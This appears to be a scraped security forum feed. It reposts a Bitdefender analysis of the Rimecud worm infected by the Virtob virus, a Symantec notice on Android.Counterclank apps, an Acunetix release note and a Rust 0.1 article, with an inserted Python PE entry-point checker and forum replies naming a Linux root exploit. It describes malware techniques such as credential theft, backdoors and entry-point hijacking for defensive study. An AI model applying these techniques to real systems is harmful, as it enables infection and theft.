Win32.Worm.Rimecud is your typical worm with a state-of-the-art spreading apparatus. For propagation it uses file-sharing applications (Ares P2P, BearShare, iMesh, Shareaza, Kazaa, DC++, eMule, LimeWire), USB devices, Microsoft MSN Messenger (sends all contacts links to sites that host malware) and network drives mapped locally. Once on the system, Rimecud injects its code into explorer.exe and steals passwords pertaining to e-banking, on-line shopping, social networking or e-mail accounts from Mozilla Firefox and Internet Explorer. In the meantime its backdoor component enables it to connect to the C&C servers and fetch commands such as flood, download and execute further malware on the compromised PC. On top of that, the worm looks for a VNC server (remote control software) that would allow the attacker remote access and control of the compromised PC.

And certain details about Win32.Virtob

Bitdefender labs have recently seen a file infector attached to the above mentioned worm - Win32.Virtob. This virus is known to infect executable files with .exe or .scr extensions by affixing a piece of malicious code to those files. The worm is an executable file, so chances are it also gets infected by the virus if it's on the same computer. Virtob then instructs the compromised executable files to firstly run the viral code (by changing the entry point) and only afterwards gives control back to the original file. Certainly this also applies to the worm - its code will be executed only after the virus code has been launched. When its code is successfully loaded into the memory, Virtob connects to two IRC servers that are in fact C&C servers, and with the help of its backdoor component, the virus is ready to receive commands from a remote attacker via the Internet.
By injecting its code into winlogon.exe and then adding this process to the firewall exception list, the virus makes sure it is granted complete Internet access and ensures its persistence – Winlogon is a critical process that, if terminated, will crash the computer. Afterwards, it infects HTML, HTM, PHP, ASP files by injecting IFrames that might silently load content from malware-laden pages. Now, imagine these two pieces of malware working together - willingly or not - from and on the same compromised system. That PC faces a twofold malware with twice as many command and control servers to query for instructions; moreover, there are two backdoors open, two attack techniques active and various spreading methods put in place. Where one fails, the other succeeds. Multiple Frankenware infections possible: If, by utter bad luck, the computer has more than one worm that applies to the virus specifications, the virus could infect more than one worm on the system. However, the virus might as well only infect the executable files in certain system locations, or of a certain length. Other viruses look for certain strings that pertain to other pieces of malware which will remain uninfected if found on the compromised system. So, one worm can be infected while others on the same system are not. If one of the two (whether the virus or the worm) is caught by the AV, the other might pass undetected. Perhaps if we think of an infected file (possibly the virus) that needs to be analyzed separately and a piece of code is taken out and looked at, maybe then someone discovers also the worm. If the worm is detected based on a signature, the worm is simply wiped out from the compromised system, without any further analysis. This would make it easier for the virus to pass unseen. There’s no rule. And two hypothetical scenarios: Hypothetical scenario No. 
1: Imagine a worm like Downadup, that has been spreading constantly around the world for three years now (70,000 infected systems in the last six months alone), being infected with a virus. On the one hand, Downadup prevents the system from updating the OS and the AV solution locally installed; and on the other hand the virus may have rootkit capabilities and open a backdoor. Downadup spreads around the world constantly, which makes it a great propagation tool; not to mention that it took AVs more than half a year, and almost a million infections, to discover it. If this had carried along a virus, all those users would have suffered greater damage. And disinfection would be more complicated. Hypothetical scenario No. 2: Imagine that a worm is infected by a file infector (virus). And an AV detects the file infector first and tries to disinfect the files, which include the worm. In some rare cases disinfecting compromised files leaves behind clean files that are at the same time altered (not identical to the original anymore). They maintain their functionality but are slightly different in form. As most files are detected according to signatures and not based on their behavior (heuristically), an altered worm (disinfected along with other files that have been compromised by a file infector and disinfected by an antivirus) may not be caught anymore by the signature applied to the original file (that had been modified after disinfection). Disinfection might this way lead to a mutation that can actually help the worm. This article is based on the technical information provided courtesy of Doina Cosovan & R?zvan Benchea, Bitdefender VirusAnalysts. All product and company names mentioned herein are for identification purposes only and are the property of, and may be trademarks of, their respective owners. Sursa: Virus infects worm by mistake - MalwareCity : Computer Security Blog
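The article's description of Virtob (code affixed to the file, entry point redirected to it, control then returned to the host) is a structural pattern a defender can check for without any signature. The following Python is an added example, not part of the Bitdefender article: it parses a PE32 header and flags an entry point that lands in a trailing, writable section; both images are constructed in memory as headers-only test data, not real samples.

```python
import struct

IMAGE_SCN_CNT_CODE = 0x00000020   # section contains code (PE/COFF spec)
IMAGE_SCN_MEM_WRITE = 0x80000000  # section is writable

def build_pe32(entry_rva, sections):
    """Headers-only PE32 image (constructed test data): sections = [(name, va, size, flags)]."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = bytearray(224)  # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)  # Magic = PE32
    struct.pack_into("<I", opt, 16, entry_rva)  # AddressOfEntryPoint
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n.encode().ljust(8, b"\0"), sz, va, sz, 0, 0, 0, 0, 0, fl)
                    for n, va, sz, fl in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + hdrs

def parse_sections(pe):
    """Return (entry_rva, [(name, va, size, flags), ...]) read from the PE headers."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file: no MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: no PE signature")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt = e_lfanew + 24  # optional header follows the 20-byte COFF header
    entry = struct.unpack_from("<I", pe, opt + 16)[0]
    first = opt + struct.unpack_from("<H", pe, e_lfanew + 20)[0]  # section table
    sections = []
    for off in range(first, first + 40 * nsec, 40):
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, rawsize = struct.unpack_from("<III", pe, off + 8)
        flags = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append((name, va, max(vsize, rawsize), flags))
    return entry, sections

def entry_point_findings(pe):
    """Reasons the entry point looks redirected into appended code (empty list = nothing odd)."""
    entry, sections = parse_sections(pe)
    hit = next((i for i, s in enumerate(sections) if s[1] <= entry < s[1] + s[2]), None)
    if hit is None:
        return ["entry point 0x%x lies outside every section" % entry]
    name, _, _, flags = sections[hit]
    first_code = next((i for i, s in enumerate(sections) if s[3] & IMAGE_SCN_CNT_CODE), None)
    findings = []
    if hit == len(sections) - 1 and hit != first_code:
        findings.append("entry point in last section %r, not the first code section" % name)
    if flags & IMAGE_SCN_MEM_WRITE:
        findings.append("entry section %r is writable" % name)
    return findings

# Constructed layouts: a normal image, and one with a writable code section appended and the entry moved into it
CLEAN = build_pe32(0x1400, [(".text", 0x1000, 0x2000, 0x60000020), (".data", 0x3000, 0x1000, 0xC0000040)])
PATCHED = build_pe32(0x4010, [(".text", 0x1000, 0x2000, 0x60000020), (".data", 0x3000, 0x1000, 0xC0000040),
                              (".extra", 0x4000, 0x800, 0xE0000020)])
```

On a real file the same check runs over the bytes read from disk; a legitimately packed binary also trips it, so treat a hit as a reason to look closer, not as a verdict.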
-
[h=1]Android.Counterclank Found in Official Android Market[/h]
by Irfan Asrar

Symantec has identified multiple publisher IDs on the Android Market that are being used to push out Android.Counterclank. This is a minor modification of Android.Tonclank, a bot-like threat that can receive commands to carry out certain actions, as well as steal information from the device.

For each of these malicious applications, the malicious code has been grafted on to the main application in a package called “apperhand”. When the package is executed, a service with the same name may be seen running on a compromised device. Another sign of an infection is the presence of the Search icon above on the home screen.

The combined download figures of all the malicious apps indicate that Android.Counterclank has the highest distribution of any malware identified so far this year.

[TABLE=width: 450]
[TR=bgcolor: #CCCCCC] [TD=width: 100]Publisher[/TD] [TD=width: 200]Malicious App Title[/TD] [TD=width: 132]Category[/TD] [/TR]
[TR] [TD]iApps7 Inc[/TD] [TD]Counter Elite Force[/TD] [TD]Arcade & Action[/TD] [/TR]
[TR] [TD]iApps7 Inc[/TD] [TD]Counter Strike Ground Force[/TD] [TD]Arcade & Action[/TD] [/TR]
[TR] [TD]iApps7 Inc[/TD] [TD]CounterStrike Hit Enemy[/TD] [TD]Arcade & Action[/TD] [/TR]
[TR] [TD]iApps7 Inc[/TD] [TD]Heart Live Wallpaper[/TD] [TD]Entertainment[/TD] [/TR]
[TR] [TD]iApps7 Inc[/TD] [TD]Hit Counter Terrorist[/TD] [TD]Arcade & Action[/TD] [/TR]
[TR] [TD]iApps7 Inc[/TD] [TD]Stripper Touch girl[/TD] [TD]Entertainment[/TD] [/TR]
[TR] [TD]Ogre Games[/TD] [TD]Balloon Game[/TD] [TD]Sports Games[/TD] [/TR]
[TR] [TD]Ogre Games[/TD] [TD]Deal & Be Millionaire[/TD] [TD]Sports Games[/TD] [/TR]
[TR] [TD]Ogre Games[/TD] [TD]Wild Man[/TD] [TD]Arcade & Action[/TD] [/TR]
[TR] [TD]redmicapps[/TD] [TD]Pretty women lingerie puzzle[/TD] [TD]Photography[/TD] [/TR]
[TR] [TD]redmicapps[/TD] [TD]Sexy Girls Photo Game[/TD] [TD]Lifestyle[/TD] [/TR]
[TR] [TD]redmicapps[/TD] [TD]Sexy Girls Puzzle[/TD] [TD]Brain & Puzzle[/TD] [/TR]
[TR] [TD]redmicapps[/TD] [TD]Sexy Women Puzzle[/TD] [TD]Brain & Puzzle[/TD] [/TR]
[/TABLE]

Symantec is continuing with further investigation and we will post more information as we discover it.

Sursa: Android.Counterclank Found in Official Android Market | Communauté Symantec Connect
-
Acunetix Web Vulnerability Scanner
By MaxiSoler on 28 January 2012 in Tools with No Comments

Acunetix Web Vulnerability Scanner (WVS) is an automated web application security testing tool that audits your web applications by checking for exploitable hacking vulnerabilities. Automated scans may be supplemented and cross-checked with the variety of manual tools to allow for comprehensive web site and web application penetration testing.

Improvements:
- The accuracy of Script Checks has been increased. The Acunetix development team is dedicated to continuously improve scan detection of security checks.
- The Graphical User Interface (GUI) has been enhanced in order to make menu navigation and usage easier and more effective than ever before.
- SSL security audit script is launched automatically when scanning an HTTPS website, regardless of whether port scanning is enabled or not.
- Added a number of new SQL Injection variants checks.

Bug Fixes:
- HPP detection security script failed when testing input scheme with excluded variants
- Apply settings button not showing up in specific cases
- Fixed several issues related to pausing and resuming of crawler
- Fixed several issues when running multiple instances of the reporter
- Two backup files were being generated because of filename case insensitivity
- Filtering of wildcards from robots.txt

This release candidate of Acunetix Web Vulnerability Scanner Version 8 is considered complete, stable, and suitable for testing.

More Information: Acunetix v8 Manual
Download Acunetix Web Vulnerability Scanner v8 RC

Sursa: IT Vulnerability & ToolsWatch | Acunetix Web Vulnerability Scanner v8 Released Candidate Released
-
[h=2]Mozilla releases Rust 0.1, the language that will eventually usurp Firefox’s C++[/h]
By Sebastian Anthony on January 24, 2012 at 6:52 am

After more than five years in the pipeline, Mozilla Labs and the Rust community have released the first alpha — version 0.1 — of the Rust programming language compiler. The Rust language emphasizes concurrency and memory safety, and — if everything goes to plan — is ultimately being groomed to replace C++ as Mozilla’s compiled language of choice. Browser prototypes programmed in Rust will eventually emerge, and then one day Firefox — or parts of Firefox — might be re-written in Rust.

A bit more about the language itself: Rust is a compiled, statically-typed, object-oriented programming language (and objects are immutable by default). The compiler is supported on Windows, Linux, and Mac. Feature-wise, Rust intentionally avoids any novel ideas, and instead builds upon existing, known features that are present in other languages. Syntax-wise, Rust uses curly braces {} like C, C++, or JavaScript, but as you can see in the code block below, the syntax is actually quite funky.

[INDENT]use std;

fn main(args: [str]) {
    std::io::println("hello world from '" + args[0] + "'!");
}
[/INDENT]

At this point we have to compare Rust to Go, Google’s new language. The Rust community explicitly says that it was not inspired by Go — development of Rust began before Go — but that other languages made by Rob Pike such as Newsqueak, Alef, and Limbo were influential. Feature-wise, the languages are quite similar, but Rust seems to be more security- and safety-oriented. Where Go has global garbage collection, null pointers, and shared mutable states, Rust GC is optional and per-task, null pointers are not allowed, and objects are immutable by default.

As far as the state of the language is concerned, most of its features work but are incomplete. Standard library APIs are subject to change. Performance isn’t yet up to scratch (eventually it should be as fast as C++). In other words, you can dive in and play with Rust, but future versions of the compiler will break your code. To get started, hit up the Rust language website — or read the Rust 0.1 release notes

Sursa: Mozilla releases Rust 0.1, the language that will eventually usurp Firefox’s C++ | ExtremeTech
-
MediaFire: "We are an American company and we comply with American law." (something along those lines) They will continue to offer hosting services.
-
Get to work, not begging. No such crap here, or you'll stay thieves your whole life. I hope you rot in prison. Permanent ban.
-
28C3: How governments have tried to block Tor (en)
Nytro replied to Nytro's topic in Tutoriale video
Ah, I knew it had been posted before, but I thought that was the German-language version, which is why I posted it. -
Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit
Nytro replied to The_Arhitect's topic in Exploituri
See this: [h=1]Linux Local Privilege Escalation via SUID /proc/pid/mem Write[/h]